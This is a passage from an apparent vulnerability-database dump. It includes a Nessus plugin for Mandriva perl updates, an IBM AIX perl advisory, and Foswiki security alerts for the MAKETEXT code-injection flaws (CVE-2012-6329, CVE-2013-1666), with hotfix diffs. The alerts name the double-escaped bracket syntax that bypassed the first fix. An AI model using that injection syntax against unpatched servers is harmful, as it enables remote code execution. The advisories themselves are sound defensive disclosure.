or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated perl packages fix security vulnerability :\n\nIt was discovered that Perl's 'x' string repeat operator is vulnerable\nto a heap-based buffer overflow. An attacker could use this to execute\narbitrary code (CVE-2012-5195).\n\nThe _compile function in Maketext.pm in the Locale::Maketext\nimplementation in Perl before 5.17.7 does not properly handle\nbackslashes and fully qualified method names during compilation of\nbracket notation, which allows context-dependent attackers to execute\narbitrary commands via crafted input to an application that accepts\ntranslation strings from users (CVE-2012-6329).\n\nIn order to prevent an algorithmic complexity attack against its\nhashing mechanism, perl will sometimes recalculate keys and\nredistribute the contents of a hash. 
This mechanism has made perl\nrobust against attacks that have been demonstrated against other\nsystems. Research by Yves Orton has recently uncovered a flaw in the\nrehashing code which can result in pathological behavior. This flaw\ncould be exploited to carry out a denial of service attack against\ncode that uses arbitrary user input as hash keys. Because using\nuser-provided strings as hash keys is a very common operation, we urge\nusers of perl to update their perl executable as soon as possible.\nUpdates to address this issue have bene pushed to main-5.8,\nmaint-5.10, maint-5.12, maint-5.14, and maint-5.16 branches today.\nVendors* were informed of this problem two weeks ago and are expected\nto be shipping updates today (or otherwise very soon) (CVE-2013-1667).\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Foswiki 1.1.5 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'TWiki MAKETEXT Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-Locale-Maketext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:perl-devel\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:perl-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perl-5.14.2-8.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"perl-Locale-Maketext-1.220.0-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perl-base-5.14.2-8.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perl-devel-5.14.2-8.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"perl-doc-5.14.2-8.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "aix": [{"lastseen": "2020-04-22T00:52:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nIBM SECURITY ADVISORY\n\nFirst Issued: Wed Apr 23 17:08:11 CST 2014\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc\nhttps://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc\nftp://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Security vulnerability in Perl for AIX\n\nPLATFORMS: 5.3, 6.1, and 7.1\n VIOS 2.2.1\n\nSOLUTION: Apply the fix as described below.\n\nTHREAT: See below.\n\nCVE Number: CVE-2012-6329\n\nReboot required? NO\nWorkarounds? NO\nProtected by FPM? NO\nProtected by SED? NO\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION\n\n CVE-2012-6329\n -------------\n The _compile function in Maketext.pm in the Locale::Maketext implementation\n in Perl before 5.17.7 does not properly handle backslashes and fully \n qualified method names during compilation of bracket notation, which allows\n context-dependent attackers to execute arbitrary commands via crafted input\n to an application that accepts translation strings from users.\n\nII. CVSS\n\n CVE-2012-6329\n CVSS Base Score: 7.5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/80566 for\n the current score\n CVSS Environmental Score*: Undefined\n CVSS String: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\nIII. 
PLATFORM VULNERABILITY ASSESSMENT\n\n The following fileset levels are vulnerable:\n\n AIX Fileset AIX Level Lower Level Upper Level\n ----------------------------------------------------------------\n perl.rte 5.3.12 5.8.8.0 5.8.8.123\n perl.rte 6.1.7 5.8.8.0 5.8.8.122\n perl.rte 6.1.8 5.8.8.0 5.8.8.244\n perl.rte 6.1.9 5.8.8.0 5.8.8.366\n perl.rte 7.1.1 5.10.1.0 5.10.1.100\n perl.rte 7.1.2 5.10.1.0 5.10.1.150\n perl.rte 7.1.3 5.10.1.0 5.10.1.200\n\n VIOS\n ----------------------------------------------------------------\n perl.rte versions 5.8.8.0 to 5.8.8.366 on VIOS 2.2.1.0 and above.\n\n Note: To find out whether the affected filesets are installed on your\n systems, refer to the lslpp command found in AIX user's guide.\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR number Availability\n ---------------------------------------------------\n 5.3 IV56641 NOW\n 6.1 IV56641 NOW\n 7.1 IV56642 NOW\n\n VIOS Level APAR number Availability\n ---------------------------------------------------\n 2.2.1.0 and up IV56641 NOW\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV56641\n http://www.ibm.com/support/docview.wss?uid=isg1IV56642\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via http\n from:\n\n\t\thttps://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp\n\n\t\tThe perl name provided in the web pack site\n For 5.3:\tperl61.zip\n For 6.1:\tperl61.zip\n For 7.1:\tperl71.zip\n For VIOS: perl61.zip\n\n To extract the fixes from the zip files:\n For 5.3: \tgunzip -S .zip perl61.zip\n For 6.1: \tgunzip -S .zip perl61.zip\n For 7.1:\tgunzip -S .zip perl71.zip\n For VIOS: gunzip -S .zip perl61.zip\n\n\t\tIMPORTANT: It is recommended that a mksysb backup of the system be\n\t\tcreated. 
Verify that this image is both bootable and readable\n\t\tbefore proceeding.\n\n\t\tTo preview the fix installation:\n\n \t\t\tinstallp -apYd . perl\t\t\t\n\n\t\tTo install the fix package:\n\t\n\t\t\tinstallp -aXYd . perl\n\t\t\nV. WORKAROUNDS\n\n There are no workarounds.\n\nVI. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit:\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgpkey.txt\n\n C. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. All other trademarks\n are property of their respective holders.\n\nVII. ACKNOWLEDGMENTS\n\n IBM discovered and fixed this vulnerability as part of its\n commitment to secure the AIX operating system.\n\nVIII. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/80566\n CVE-2012-6329: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. 
Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (AIX)\n\niEYEARECAAYFAlNYLGwACgkQ4fmd+Ci/qhIkcwCdGTeDNw2OsdOucTB+DatOm1Xd\nzNgAn2rexeS9aaXvG+PawwR0WGgEK7p0\n=d7gB\n-----END PGP SIGNATURE-----\n", "edition": 15, "modified": "2014-04-23T17:08:11", "published": "2014-04-23T17:08:11", "id": "PERL_ADVISORY4.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc", "title": "Security Vulnerability in Perl _compile", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-06T03:34:50", "edition": 2, "description": "Foswiki versions 1.0.0 through 1.0.10 and 1.1.0 through 1.1.6 suffer from code injection and denial of service vulnerabilities.", "published": "2012-12-18T00:00:00", "type": "zdt", "title": "Foswiki 1.0.10 / 1.1.6 Code Injection / Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6330", "CVE-2012-6329"], "modified": "2012-12-18T00:00:00", "id": "1337DAY-ID-20000", "href": "https://0day.today/exploit/description/20000", "sourceData": "---+ Security Alert: Code injection vulnerability in MAKETEXT macro,\r\nDenial of Service vulnerability in MAKETEXT macro.\r\n\r\nThis advisory alerts you of a potential security issue with your Foswiki\r\ninstallation. 
A vulnerability has been reported against the core Perl\r\nmodule CPAN:Locale::Maketext, which Foswiki uses to provide translations\r\nwhen {UserInterfaceInternationalization} is enabled in the\r\nconfiguration. Because of this vulnerability it may be possible for a\r\nuser to run arbitrary shell commands and code on the server through a\r\ncrafted %MAKETEXT% macro. If your wiki allows commenting by users\r\nwithout first logging in, then it may be possible for such an anonymous\r\nuser to exploit this vulnerability.\r\n\r\n\r\n---++ Severity Level\r\n\r\nSeverity 1 issue: The web server can be compromised\r\nThe severity level was assigned by the Foswiki\r\nCommunity.SecurityTaskTeam as documented in Development.SecurityAlertProcess\r\n\r\n---++ Vulnerable Software Versions\r\n\r\nAll released versions of Foswiki are vulnerable to these issues\r\n\r\n - Foswiki 1.0.0 - 1.0.10\r\n - Foswiki 1.1.0 - 1.1.6\r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name\r\nCVE-2012-6329 to this vulnerability, see\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329\r\nCVE-2012-6330 was assigned to the Denial of Service vulnerability, see\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6330\r\n\r\n---++ Attack Vectors\r\n\r\nEditing wiki pages and HTTP POST requests towards a Foswiki server with\r\nenabled localization (typically port 80/TCP). Typically, prior\r\nauthentication is necessary.\r\n\r\nA crafted %MAKETEXT{}% macro will pass through strings to\r\nLocale::Maketext where they are executed under the control of the CGI\r\nuser on the server. Any user with the authority to edit a topic,\r\ncomment on a topic, or execute the Foswiki rendering code (eg. The\r\nRenderPlugin) can take advantage of the vulnerability. (CVE-2012-6329)\r\n\r\nA crafted %MAKETEXT{}% macro will consume large amounts of memory and\r\nexhaust swap space. 
(CVE-2012-6330)\r\n\r\n---++ Impact\r\n\r\nArbitrary code execution on the server can expose the file system.\r\n\r\nA second less severe Denial of Service vulnerability is also addressed\r\nby this alert.\r\n\r\n---++ Details\r\n\r\nA crafted %MAKETEXT{}% macro can cause multiple issues:\r\n * Execute arbitrary code on the server by passing unsanitized strings\r\nto Locale::Maketext.\r\n * Consume memory and swap space resulting in potential lockup or\r\ncrash due to %<nop>MAKETEXT{}% not validating the parameter numbers\r\nsupplied in the [_nnn] tokens.\r\n * Cause an exception within Foswiki, also due to invalid parameters\r\nin [_nnn] tokens\r\n\r\n\r\n---++ Countermeasures\r\n\r\nOne of the following should be done as soon as possible.\r\n\r\n * Manually Apply hotfix (see patch below). __or__\r\n * Apply the\r\n[[Extensions.PatchItem12285Contrib][http://foswiki.org/Extensions/PatchItem12285Contrib]]\r\nto your Foswiki 1.1.x system (Does not apply to Foswiki 1.0.x) __or__\r\n * Disable {UserInterfaceInternationalization} in your LocalSite.cfg\r\n_(Does not protect against [[SecurityAlert-CVE-2012-6330]])_ __or__\r\n * The foswiki debian package has already been updated with the hotfix\r\n- use your preferred package management tool to update to foswiki 1.1.6-2\r\n\r\nIn addition, CPAN:Locale::Maketext version 1.23 or newer should be\r\ninstalled.\r\n\r\nUpgrade to the latest patched production Download.FoswikiRelease01x01x07\r\nonce released\r\n\r\n*The Foswiki patch fixes other issues with the %MAKETEXT% macro beyond\r\nthe code execution issue. Even if the new Locale::Maketext is installed,\r\nit is strongly recommended to apply the Foswiki patch.*\r\n\r\n\r\n---++ Hotfix for Foswiki Release 1.1.0 - 1.1.6\r\n\r\nInstall http://foswiki.org/Extensions.PatchItem12285Contrib and verify\r\nthat the patch has been applied to lib/Foswiki/Macros/MAKETEXT.pm. The\r\nextension will attempt to apply two patches, and should report that 1\r\nfile was patched. 
Only one of the patches will match your system. This\r\npatch fixes both CVE-2012-6329 CVE-2012-6330.\r\n\r\n> Running Post-install exit for PatchItem12285Contrib...\r\n> Processing /var/www/data/Foswiki-1.1.1/working/configure/patch/Item12285-001.patch\r\n> ...\r\n> MD5 Matched - applying patch version Foswiki 1.1.0 - 1.1.2.\r\n> Update successful for /var/www/data/Foswiki-1.1.0/lib/Foswiki/Macros/MAKETEXT.pm\r\n> .\r\n> 1 file patched\r\n> ...\r\n> Processing /var/www/data/Foswiki-1.1.1/working/configure/patch/Item12285-002.patch\r\n> ...\r\n> No files matched patch signatures\r\n\r\n\r\nOn a properly patched system, %MAKETEXT{\" [_101] \"}% should return an\r\nerror.\r\n> Excessive parameter number 101, MAKETEXT rejected. \r\n\r\nNote that this Contrib will also install the\r\nExtensions.PatchFoswikiContrib as a prerequisite. PatchFoswikiContrib\r\npatches the Extensions installer to accept the new style version strings\r\nused for modules released as of 1.1.6.\r\n\r\n---++ Hotfix for Foswiki Archived Release 1.0.0-1.0.10\r\n\r\nThis patch fixes both [[SecurityAlert-CVE-2012-6329]] and\r\n[[SecurityAlert-CVE-2012-6330]].\r\n\r\nThis release should be manually patched.\r\n\r\nIn Foswiki.pm, in the sub MAKETEXT\r\n\r\n============ vvv CUT vvv =============\r\n--- Foswiki.pm 2010-01-17 09:16:20.000000000 -0500\r\n+++ Foswiki.pm 2012-12-10 10:06:37.389129654 -0500\r\n@@ -4200,6 +4200,9 @@\r\n $str =~\r\n s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ $max = $2 if ($2 > $max); \"[$1]\"/ge;\r\n+ return \"Illegal parameter number\" if ($max > 100);\r\n+ $str =~ s#\\\\#\\\\\\\\#g;\r\n+\r\n # get the args to be interpolated.\r\n my $argsStr = $params->{args} || \"\";\r\n\r\n============ ---CUT--- =============\r\n\r\n\r\n---++ Manual patch for Foswiki Release 1.1.0 -> 1.1.6\r\n\r\nInstalling the Extensions.PatchItem12285Contrib is the best way to patch\r\nyour system - you can however see the patch we apply here. 
This patch\r\nfixes both [[SecurityAlert-CVE-2012-6329]] and\r\n[[SecurityAlert-CVE-2012-6330]]:\r\n\r\n============ vvv CUT vvv =============\r\n--- lib/Foswiki/Macros/MAKETEXT.pm 2012-12-11 10:51:12.959268829 -0500\r\n+++ lib/Foswiki/Macros/MAKETEXT.pm 2012-12-11 10:37:31.674486503 -0500\r\n @@ -4,9 +4,19 @@\r\n use strict;\r\n use warnings;\r\n+use Locale::Maketext;\r\n+my $escape =\r\n+ ( $Foswiki::cfg{UserInterfaceInternationalisation}\r\n+ && $Locale::Maketext::VERSION\r\n+ && $Locale::Maketext::VERSION < 1.23 );\r\n+\r\n sub MAKETEXT {\r\n my ( $this, $params ) = @_;\r\n+ my $max;\r\n+ my $min;\r\n+ my $param_error;\r\n+\r\n my $str = $params->{_DEFAULT} || $params->{string} || \"\";\r\n return \"\" unless $str;\r\n 
@@ -18,15 +28,22 @@\r\n $str =~ s/~~\\[/~[/g;\r\n $str =~ s/~~\\]/~]/g;\r\n+ $max = 0;\r\n+ $min = 1;\r\n+ $param_error = 0;\r\n+\r\n # unescape parameters and calculate highest parameter number:\r\n- my $max = 0;\r\n- $str =~ s/~\\[(\\_(\\d+))~\\]/ $max = $2 if ($2 > $max); \"[$1]\"/ge;\r\n+ $str =~ s/~\\[(\\_(\\d+))~\\]/_validate($1, $2, $max, $min,\r\n$param_error)/ge;\r\n $str =~\r\n-s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ $max = $2 if ($2 > $max); \"[$1]\"/ge;\r\n+s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ _validate($1, $2, $max, $min,\r\n$param_error)/ge;\r\n+ return $str if ($param_error);\r\n # get the args to be interpolated.\r\n my $argsStr = $params->{args} || \"\";\r\n+ # Escape any escapes.\r\n+ $str =~ s#\\\\#\\\\\\\\#g if ($escape); # escape any escapes\r\n+\r\n my @args = split( /\\s*,\\s*/, $argsStr );\r\n # fill omitted args with empty strings\r\n@@ -47,6 +64,26 @@\r\n return $result;\r\n }\r\n+sub _validate {\r\n+\r\n+ #my ( $contents, $number, $max, $min, $param_error ) = @_\r\n+\r\n+ $_[2] = $_[1] if ( $_[1] > $_[2] ); # Record maximum param number\r\n+ $_[3] = $_[1] if ( $_[1] < $_[3] ); # Record minimum param number\r\n+\r\n+ if ( $_[1] > 100 ) {\r\n+ $_[4] = 1; # Set error flag\r\n+ return\r\n+\"<span class=\\\"foswikiAlert\\\">Excessive parameter number $_[2],\r\nMAKETEXT rejected.</span>\";\r\n+ }\r\n+ if ( $_[1] < 1 ) {\r\n+ $_[4] = 1; # Set error flag\r\n+ return\r\n+\"<span class=\\\"foswikiAlert\\\">Invalid parameter <code>\\\"$_[0]\\\"</code>,\r\nMAKETEXT rejected.</span>\";\r\n+ }\r\n+ return \"[$_[0]]\"; # Return the complete bracket parameter\r\nwithout escapes\r\n+}\r\n+\r\n 1;\r\n __END__\r\n Foswiki - The Free and Open Source Wiki, http://foswiki.org/\r\n\r\n============ ^^^ CUT ^^^ =============\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2012-12-05 - The Locale::Maketext vulnerability was discussed on\r\nthe Perl5Porters email list, triggered review of Foswiki code.\r\n * 2012-12-05 - Patched version (1.23) of 
Locale::Maketext is released.\r\n * 2012-12-08 - The [_999999] DoS issue identified and sent to foswiki\r\nsecurity list.\r\n * 2012-12-09 - The \"remote execution\" vulnerability in\r\nLocale::Maketext was confirmed on Foswiki.\r\n * 2012-12-09 - Requested the CVE from [email\u00a0protected]\r\n * 2012-12-09 - TWiki notified of the Vulnerability.\r\n * 2012-12-10 - Developer fixes code (George Clark) and security team\r\nvalidates the fixes.\r\n * 2012-12-10 - Extensions.PatchItem12285Contrib released for Foswiki\r\n1.1.x\r\n * 2012-12-10 - Security team creates advisory with hotfix.\r\nAnnouncement delayed for coordination with TWiki (George Clark)\r\n * 2012-12-12 - Updated Debian packages released (Sven Dowideit)\r\n * 2012-12-12 - Send alert to foswiki-announce and foswiki-discuss\r\nmailing lists ( )\r\n * 2012-12-14 - Publish advisory in Support web and update all related\r\ntopics ( )\r\n * 2012-12-14 - Reference to public advisory on Download page and\r\nKnown Issues ( )\r\n * 2012-xx-xx - Release Manager builds patch release ( )\r\n * 2012-xx-xx - Issue a public security advisory ([email\u00a0protected],\r\n[email\u00a0protected], [email\u00a0protected],\r\n[email\u00a0protected], [email\u00a0protected]) ( )\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20000"}, {"lastseen": "2018-02-17T21:31:18", "edition": 2, "description": "This advisory alerts you of a potential security issue with your Foswiki installation. A vulnerability has been reported against the core Perl module CPAN:Locale::Maketext, which Foswiki uses to provide translations when {UserInterfaceInternationalization} is enabled in the configuration. 
Because of this vulnerability it may be possible for a user to invoke arbitrary perl modules on the server through a crafted macro.", "published": "2013-02-20T00:00:00", "type": "zdt", "title": "Foswiki MAKETEXT 1.1.7 / 1.0.10 Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1666", "CVE-2012-6329"], "modified": "2013-02-20T00:00:00", "id": "1337DAY-ID-20407", "href": "https://0day.today/exploit/description/20407", "sourceData": "---+ Security Alert: Code injection vulnerability in MAKETEXT macro\r\n\r\nThis advisory alerts you of a potential security issue with your Foswiki\r\ninstallation. A vulnerability has been reported against the core Perl\r\nmodule CPAN:Locale::Maketext [1], which Foswiki uses to provide\r\ntranslations when {UserInterfaceInternationalization} is enabled in the\r\nconfiguration. Because of this vulnerability it may be possible for a\r\nuser to invoke arbitrary perl modules on the server through a crafted \r\nmacro.\r\n\r\nThe original fix for this issue reported in\r\n[[SecurityAlert-CVE-2012-6329]] [2] failed to eliminate one possible\r\nattack vector. 
This CVE applies an additional fix for the original issue.\r\n\r\nThe system is *not vulnerable* if ={UserInterfaceInternationalisation}= \r\nis not enabled in your configuration, or if =Locale::Maketext= has been\r\nupgraded to version 1.23 as advised in [[SecurityAlert-CVE-2012-6329]] [2].\r\n\r\n---++ Severity Level\r\n\r\nSeverity 1 issue: The web server can be compromised.\r\n\r\nThe severity level was assigned by the Foswiki\r\nCommunity.SecurityTaskTeam [3] as documented in\r\nDevelopment.SecurityAlertProcess [4]\r\n\r\n---++ Vulnerable Software Versions\r\n\r\nAll releases of Foswiki.\r\n * Foswiki-1.0.0 to Foswiki-1.0.10\r\n * Foswiki-1.1.0 to Foswiki-1.1.7\r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name\r\nCVE-2013-1666 [5] to this vulnerability.\r\n\r\n---++ Attack Vectors\r\n\r\nEditing wiki pages and HTTP POST requests towards a Foswiki server with\r\nenabled localization (typically port 80/TCP). Typically, prior\r\nauthentication is necessary. If your wiki allows commenting by users\r\nwithout first logging in, then it may be possible for such an anonymous\r\nuser to exploit this vulnerability.\r\n\r\nThe original report ( [[SecurityAlert-CVE-2012-6329]] [2]) against\r\nLocale::Maketext also identified another vector, where a module name can\r\nbe passed in to Locale::Maketext through the bracket notation. At the\r\ntime we determined that Foswiki was not vulnerable to this vector, as\r\nFoswiki does not permit that syntax to be used. 
__This was incorrect__.\r\nIt is possible to bypass the checks by double-escaping the brackets.\r\n\r\n---++ Impact\r\n\r\nArbitrary code execution on the server as the webserver user.\r\n\r\n---++ Details\r\n\r\nA crafted %MAKETEXT{}% macro can cause multiple issues: This CVE\r\naddresses an additional vector:\r\n * NEW *Execute arbitrary perl modules by escaping brackets within\r\nMAKETEXT =~~[Some::Module,~~]= (CVE-2013-1666)*\r\n * Execute arbitrary code on the server by passing unsanitized strings\r\nto Locale::Maketext. (CVE-2012-6329)\r\n * Consume memory and swap space resulting in potential lockup or\r\ncrash due to %MAKETEXT{}% not validating the parameter numbers supplied\r\nin the =[_nnn]= tokens. (CVE-2012-6330)\r\n * Cause an exception within Foswiki, also due to invalid parameters\r\nin =[_nnn]= tokens\r\n\r\n\r\n---++ Countermeasures\r\n\r\nApply one of these countermeasures:\r\n * Apply hotfix (see patch below).\r\n * Install Extensions.PatchItem12391Contrib [6]\r\n * Disable ={UserInterfaceInternationalisation}= in your =!LocalSite.cfg=\r\n * Upgrade to Foswiki-1.1.8 once available.\r\n\r\nIn addition to the above, Locale::Maketext should be upgraded to version\r\n1.23.\r\n\r\nYou can verify that the patches are successful by using the following\r\ntwo lines in a test topic:\r\n\r\n * If a warning about MAKETEXT Rejected is displayed here, your system\r\nis patched for Item12285: %MAKETEXT{\"[_101]\"}%\r\n * If ==[quant,4,singular,plural]== is displayed at the end of this\r\nline, your system is patched for Item12391: <b><tt>%MAKETEXT{\"\r\n~~[quant,4,singular,plural~~] \"}%</tt></b>\r\n\r\nNote: If the 2nd line displays =~[quant,4,singular,plural~]= (shows the\r\n~ character) then your system is not patched, but is not vulnerable\r\nbecause Internationalization is disabled.\r\n\r\n---++ Authors and Credits\r\n\r\n * John Lightsey for disclosing the issue to the foswiki-security list.\r\n * CrawfordCurrie, PaulHarvey and GeorgeClark for 
contributing to the\r\nfix, the 1.1.8 release and advisory.\r\n * Members of the Foswiki security team for discussions and for\r\nediting this security advice.\r\n\r\n---++ Hotfix for Foswiki Production Release 1.1.0-1.1.7\r\n\r\nThe line numbers may vary between releases, but the two regular\r\nexpressions should be changed as shown below:\r\n\r\n=================( CUT )================\r\n--- lib/Foswiki/Macros/MAKETEXT.pm 2013-02-13 10:26:42.520780283 -0500\r\n+++ lib/Foswiki/Macros/MAKETEXT.pm 2013-02-13 10:26:51.362682708 -0500\r\n@@ -25,8 +25,8 @@\r\n $str =~ s/\\]/~]/g;\r\n\r\n # restore already escaped stuff:\r\n- $str =~ s/~~\\[/~[/g;\r\n- $str =~ s/~~\\]/~]/g;\r\n+ $str =~ s/~~+\\[/~[/g;\r\n+ $str =~ s/~~+\\]/~]/g;\r\n\r\n $max = 0;\r\n $min = 1;\r\n\r\n=================( CUT )================\r\n\r\n---++ Hotfix for Foswiki Production Release 1.0.0-1.0.10\r\n\r\nApply the above patch to Foswiki.pm, in the vicinity of line 4193\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2013-02-12 - User discloses issue to foswiki security mailing list\r\n(John Lightsey)\r\n * 2013-02-13 - Developer verifies issue (George Clark)\r\n * 2013-02-13 - Security team triage the issue (George Clark, Crawford\r\nCurrie, Paul Harvey)\r\n * 2013-02-13 - Developer fixes code (George Clark)\r\n * 2013-02-14 - Security team creates advisory with hotfix (George Clark)\r\n * 2013-xx-xx - Release Manager builds patch release (name)\r\n * 2013-02-14 - Send alert to foswiki-announce and foswiki-discuss\r\nmailing lists (George Clark)\r\n * 2013-02-19 - Publish advisory in Support web and update all related\r\ntopics (George Clark)\r\n * 2013-02-19 - Reference to public advisory on Download page and\r\nKnown Issues (George Clark)\r\n * 2013-02-19 - Issue a public security advisory ([email\u00a0protected],\r\n[email\u00a0protected], [email\u00a0protected] [email\u00a0protected]\r\n[email\u00a0protected]) (name)\r\n\r\n---++ External Links\r\n\r\n[1] 
